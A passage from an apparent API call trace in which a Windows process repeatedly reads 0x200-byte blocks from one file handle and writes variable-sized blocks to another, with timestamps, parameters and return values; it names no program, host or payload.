lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.136] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.137] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.137] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x147, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.138] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.138] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.139] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x256, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.139] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.140] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.140] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.141] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x15b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.141] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.142] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.144] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x157, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.144] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.145] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.145] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1fa, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.146] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.146] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.147] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x192, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.147] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.148] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.148] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ab, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.149] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.149] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.150] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x38b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.150] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.151] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.151] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x24e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.152] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.152] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.153] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.153] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x207, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.154] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.154] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.155] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.155] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.156] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.157] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xf1, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.157] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.158] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.158] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2f4, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.159] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.159] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.160] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.160] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.161] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.161] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2db, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.162] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.162] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.163] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x24c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.163] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.164] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.164] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1d8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.165] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.165] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.166] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x335, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.166] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.167] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.167] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3bd, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.168] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.168] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.169] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.169] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x148, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.170] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.170] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.171] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.172] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x5e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.172] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.173] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.173] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.174] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x126, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.174] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.174] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.175] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.176] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x141, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.176] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.177] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.177] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.178] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x151, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.178] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.179] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.179] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.180] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.180] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.181] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.181] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.182] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x11f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.182] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.183] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.183] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.184] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x16, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.184] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.185] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.185] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.186] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x99, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.186] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.187] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.187] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.188] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2c1, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.188] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, 